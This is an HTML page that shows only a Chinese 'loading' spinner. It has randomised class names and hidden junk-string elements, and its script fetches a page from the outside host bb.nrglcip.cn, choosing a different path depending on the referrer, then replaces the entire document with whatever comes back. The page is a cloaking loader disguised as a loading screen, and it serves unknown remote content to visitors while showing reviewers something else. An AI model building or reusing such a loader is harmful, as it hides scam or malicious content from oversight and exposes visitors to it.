<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kMcCZ9qciQp {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kMcCZ9qciQp .qDiNYWkIRs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kMcCZ9qciQp .content {
            line-height: 50px;
            text-align: center
        }

        .kMcCZ9qciQp .img {
            width: 100%
        }

        .kMcCZ9qciQp .g3HpADUl {
            text-align: center
        }

        .kMcCZ9qciQp .g3HpADUl span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kMcCZ9qciQp .g3HpADUl span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kMcCZ9qciQp .g3HpADUl span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kMcCZ9qciQp .g3HpADUl span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kMcCZ9qciQp .g3HpADUl span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kMcCZ9qciQp .g3HpADUl span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kMcCZ9qciQp .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FFDCNgPeX1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var pIPgfEr = FFDCNgPeX1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ pIPgfEr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ pIPgfEr +".html?a=share";
		}
		
        VWht2mSiQ=url+"#"+new Date().getTime();
        VWht2mSiQ && function() {
            $.get(VWht2mSiQ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >BHbQ1aBDH6PKG1</ul>
<a  href='#' style='display:none'>F9Ka7SIoB39BxalNxLxj2tgcZ8hzIilQyDWN9I8P01BvBdop813F2uUnQ3GK7B1nb5hCSHvZ0z8Fu9sndqTC</a>
<b style='display:none' >nypyWrl7LFPz5GjEhFRiK7eGEWauF6RznDOYYCxi0kWanvElqq5JKppLLnB4RnwA0uMF1lU246OZjzuLXSbpajDFoHN4iHJEsJ</b>
<p  style='display:none'>HuxLEfOrP3VLP5hDnwojn93enL2N8DTY0JG</p>
<span style='display:none'>sEpjc3xUDQTXsd0z7YtN9Accuc8jT</span><div class="kMcCZ9qciQp">
    <div class="qDiNYWkIRs">
        <div class="g3HpADUl">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >rTqg9rMxzLhC32YvpiFg</ul></body>
</html>